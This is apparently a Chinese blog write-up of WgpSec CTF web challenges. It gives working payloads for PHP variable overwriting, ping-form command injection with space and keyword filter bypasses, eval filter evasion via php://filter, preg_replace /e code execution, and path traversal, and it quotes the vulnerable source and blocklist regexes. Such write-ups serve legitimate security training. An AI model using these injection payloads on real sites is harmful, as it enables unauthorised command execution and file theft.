WgpSec CTF-Web部分wp

已于 2023-09-24 12:38:59 修改
阅读量263 收藏
点赞数 1
文章标签: 前端 web安全
于 2023-09-18 22:04:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74606212/article/details/132997316
版权

你可能需要一部Iphone

 这里需要iphone的user-agent

网上找了一个

Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148

 修改phone里的user-agent

即可拿到flag

baby.php

源代码:

<?php

highlight_file('source.txt');
echo "<br><br>";

$flag = 'xxxxxxxx';
$msg_giveme = 'Give me the flag!';
$msg_getout = 'No this. Get out!';
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($msg_giveme);
}

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($msg_getout);
}

foreach ($_POST as $key => $value) {
    $$key = $value;
}

foreach ($_GET as $key => $value) {
    $$key = $$value;
}

echo 'the flag is : ' . $flag;

?>

浅看一下是get传参和post传参

最关键的就是双$也就是变量覆盖了,

因为key必须为flag,对于post来说,你传的value都会赋值给$flag

但对于get来说,你传的value还必须有值。

最后输出$flag的值,如果想获取到flag,那么其值必须不能变动

payload:

?a=flag&flag=a

小心我ping死你

简单试一下过滤,发现;可以使用

ls被过滤了

127.0.0.1;dir

 这里空格也被过滤了

可以使用

${IFS}$9
{IFS}
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
IFS

查看index.php

127.0.0.1;tac$IFS$9index.php

index.php代码

 print_r($a); echo "
";
		$a = shell_exec("ping -c 4 ".$ip);
		}
			die("you cant get flag !");
		else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
		}
			die("no no no you cant use ls it  !!!");
		else if(preg_match("/ls/", $ip)){
		}
			die("no no no you cant use base64 it  !!!");
		else if(preg_match("/base64/", $ip)){
		}
			die("no no no you cant use cat it  !!!");
		else if(preg_match("/cat/", $ip)){
		}
			die("do not bash hacker !!!");
		else if(preg_match("/bash/", $ip)){
		}
			die("do not space hacker !!");
		else if(preg_match("/ /", $ip)){
		}
			die("do not symbol hacker !!");
			echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
			print($ip);
			print_r($match);
		if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
		$ip = $_GET['ip'];
	if(isset($_GET['ip'])){

发现过滤一堆东西

这里可以使用拼接绕过

payload:

?ip=127.0.0.1;a=g;tac$IFS$1fla$a.php

拿到flag 

DingDingDIng🐾 

源代码:

<?php
show_source(__FILE__);
error_reporting(0);
$you = "you are ?";
extract($_POST);
if($you != 'i am pig'){
    echo '<img src="./Ding.gif">'."</br>";
    die('Ding Ding Ding ~');
}

$peiqi = ["y","eval","assert","print_r","system", "shell_exec","ini_set", "scandir", "exec","proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"];
$peiqi = array_merge($peiqi, get_defined_functions()['internal']);
foreach($peiqi as $i){
    if(stristr($_GET[peiqi], $i)!==false){
        echo '<img src="./heihei.jpg">'."</br>";
        die('修完bug就可以睡觉了,嘿嘿嘿~');
    }
}
eval($_GET[peiqi]);
//flag 在 ./flag.php里
?>

使用拼接绕过 

payload:

POST:you=i am pig
GET:?peiqi=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

base64解码即可(别忘把后面/Pgo=删掉)

php is the best !!!

源代码:

 <?php
    highlight_file(__FILE__);
    $who = "who are you?";
    $str = "I am a CTF player";
    extract($_POST);
    if(strcmp($who, $str)){
        echo "<h1>$who</h1>";
        die();
    }
    echo '<h1>PHP是世界上最好的语言</h1>';
    function Ameng($key, $value){
        return preg_replace('/(' . $key . ')/ei', 'strtolower("\\1")', $value);
    }
    foreach ($_GET as $key => $value){
        echo Ameng($key, $value);
    }
?>

第一步是绕过strcmp

strcmp比较的是字符串类型,如果强行传入其他类型参数,会出错,出错后返回值0,正是利用这点进行绕过。

所以可以构造payload:

who[]=x

接下来是preg_replace()函数/e模式

这里参考https://www.cnblogs.com/W4nder/p/12361646.html

payload:

?\S*=${phpinfo()}

 然后搜索flag即可

Poems

先看一下code.py

#flag in /flag
@app.route('/')
def get_poem():
    poemname = request.args.get('name')

    if not poemname:
        return render_template("result.html",message=os.listdir('poems'))

    poemdir = os.path.join(os.getcwd(), 'poems')
    poempath = os.path.join(poemdir, poemname)

    if '..' in poemname:
        return 'Illegal substring detected.', 403

    if not os.path.exists(poempath):
        return 'File not found.', 404

    return send_file(poempath)

从 URL 的查询参数中获取名为 'name' 的参数。例如,如果用户访问/?name=example.txt,那么poemname就会被设置为example.txt。

我们打开网站

flag就在文件里面 

尝试找到你的小姐姐吧! 

开局一张图,剩下全靠编

遇事不决robots.txt一下

 运气真好

网址被吃掉了,可以看看Hint里面是什么内容

Hint{4WIKZ2FPWTS3BD7FU6IOLJ4Q46C2PZ4JQ7UYPDHJTWRONHEJ4WS33ZFYTTUKLP7PXSGONHEJ42ZKDZU4RHUK7FPIX6D6RLVQ4S5IXZU4VTTITE7FXSAOLENC566J6===}

 base32解码

打开小姐姐照片,搜索flag

 /7b6ca699

果然漂亮小姐姐大家都喜欢

上面给的密码显示错误

但因为之前讲了密码为5位数字

直接爆破 

一下就爆出来了,还以为要绕过验证码呢

登入即可

 提交flag里面{}的内容即可,不用提交flag这个字母,真奇怪

orzw
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
WgpSecCTF刷题
不好好做安全的运维足球狗
01-06 1541
WgpSecCTF刷题 小心我PING死你 解题思路:PHP命令执行与绕过 /?ip=127.0.0.1;ls 通过GET方式提交常见Linux命令发现ls、cat、空格等均被过滤 通过dir发现目录下存在flag.php与index.php 利用less、more、tac等替代cat,查看index.php代码如下: ?> } print_r($a); echo " "; $a = shell_exec("ping -c 4 ".$ip); } die("you cant ge
ctf图片隐写_WgpSec CTF 神奇的字符 图片隐写 WP
weixin_39623805的博客
11-29 1034
我们在 ctf.wgpsec.org 上线了一些CTF题目,作为平台 plat.wgpsec.org 邀请码的挑战题,欢迎各位大佬挑战。神奇的字符NzM3OTZlNzQ3YjM2Mzc3MzM5MzU3MDM5MzgzNzMwMzkzMTM0MzIzOTZmMzAzOTM3NzMzMjM1MzIzNTM1NzMzNjM5MzczMDM4MzA3ZA==题目提示:听说16世纪的凯撒大帝很喜...
WgpSec(狼组安全) CTF PHPCode题目记录
e6678的博客
03-23 1440
PHPCode strcmp 题目描述 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag:
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-web学习大纲
01-30
CTF-web学习大纲
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战使用PHP在Web中进行CTF挑战链接: :
vue源码之mustache模板引擎1
最新发布
qweasl_的博客
05-21 162
模板引擎的一个有点:它是将数据转为视图的最优雅的方法。相信vue的玩家首先想到的是。而还没学vue的朋友,就只能进行dom操作了。通过数组的join方法。以及es6推出的模板字符串。
WEB转Flutter基础学习笔记(内含vue和flutter对比)
小易不止于搬砖的博客
05-17 673
笔者是一名web前端,记录在转栈flutter时的学习笔记,内涵和vue的对比,能够辅助前端同学更容易理解flutter
Web】CISCN 2024初赛 题解(全)
uuzeray的博客
05-21 618
这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹。注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错。再打sqlite,指定tableName,加载写入的恶意so文件,反弹shell。最后注意要将获取的变量元组转字符串,再用逗号分隔,依次输出,从而绕过seed。考的python栈帧沙箱逃逸,获取到外部的栈帧,就可以用。因为ban了引号,考虑hex2bin,将数字转为字符串。
vue3.0+antdv的admin管理系统vue-admin-beautiful推荐
独行猫a 的沉淀、积累、总结。天天学习,好好向上...c/c++,嵌入式 linux,Android,HarmonyOS)
05-15 1111
几年前,笔者自学了vue这一优秀的前端框架,但苦于没项目练手,无意间发现了这一优秀的前端集成框架。当时就使用它做了一很有意思的小项目---终端监控云平台,实现了前端和后台的整体功能。整体方案介绍参见博文《》,前端使用vue-admin-beautiful框架,后端使用go-zero微服务框架,几天内就搞出来了一个包含前端和后台的小项目。我的monitor-ui前端运行界面:后续有机会介绍下我这个终端监控云平台小项目的具体实现,挺有意思的。几年前还用到过几个地方的公交客户现场,客户挺喜欢这个功能的。
搭建自己的视频通话服务器Janus(WebRTC)
lvronglee的专栏
05-21 348
因为默认的代码,https是会请求8089的https请求的。apt install janus的源码安装了之后,要么自己写demo,要么直接用源码里面的前端页面。注意这里的pem文件,以及代理。janus 是后端,需要nginx或者其他等提供前端页面的服务器,此外因为这里并没有正式的证书,只能用自签名的证书用于https。穿透用来着,如果是局域网部署的,没有影响,如果部署到阿里云这样的,需要这个来做NAT穿透。随便注册个名字,然后用手机打开手机网络,这里看能不能穿透,不用和测试机一样的网络环境。
Web Speech API(2)—— SpeechSynthesis
LiangRZ
05-21 253
Web Speech API 有两个部分:SpeechSynthesis 语音合成(文本到语音 TTS)和 SpeechRecognition 语音识别(异步语音识别)。语音合成 (也被称作是文本转为语音,英语简写是 tts) 包括接收 app 中需要语音合成的文本,再在设备麦克风播放出来这两个过程。其中包含了将由语音服务朗读的内容,以及如何朗读它(例如:语种、音高、音量)。语音合成服务的控制器接口,可用于获取设备上可用的合成语音,开始、暂停以及其他相关命令的信息。控制器,从而获取语音合成功能的入口。
解决 SpringBoot 的 Date、LocalDateTime 变成时间戳和数组的问题,创建自定义对象消息转换器
shijialeya
05-18 402
解决 SpringBoot 的 Date、LocalDateTime 变成时间戳和数组的问题,创建自定义对象消息转换器进行数据格式化。
综合性练习-验证码
cj13106811623的博客
05-15 822
生成验证码param(参数): 无Return: 图片的内容校验验证码用户输入的验证码5. 代码编写生成验证码://图型验证码写出,可以写出到文件,也可以写出到流try {//返回到浏览器修改前端代码相对应的接口验证成功。
前端-移动端布局
Kongfutu的博客
05-21 71
可以在浏览器里打开检查 点击一下移动端按钮 然后选择一下对应的手机型号可以切换到对应的手机端。进阶学习建议 Vue.js 和 微信小程序。如何在PC端模拟移动端设备。
【VueRouter 的基本使用】
2302_76611599的博客
05-17 172
完成Vue Router 安装后,就可以使用路由了,路由的基本使用步骤,首先定义路由组件,以便使用Vue Router控制路由组件展示与 切换,接着定义路由链接和路由视图,以便告知路由组件渲染到哪个位置,然后再项目中创建路由模块,最后导入并挂载路由模块。为了在页面中将路由对应的组件显示出来,还要在App组件中定义路由视图。路由视图标签定义,该标签会被渲染成当前路由对应组件,另外,为了方便在不同组件之间切换,可以通过标签定义路由链接,该标签的to属性表示链接地址,与路由匹配规则中的path属性对应。
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),并提交给平台进行验证。 "此地无银三百"是ctf-qsnctf平台上的一道题目,它的名称可能是一个提示,暗示着解题的思路。具体的解题方法和答案我无法透露,因为这会破坏比赛的公平性和乐趣。如果你对这道题目感兴趣,我建议你在ctf-qsnctf平台上注册账号并参与比赛,通过自己的努力和思考来解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值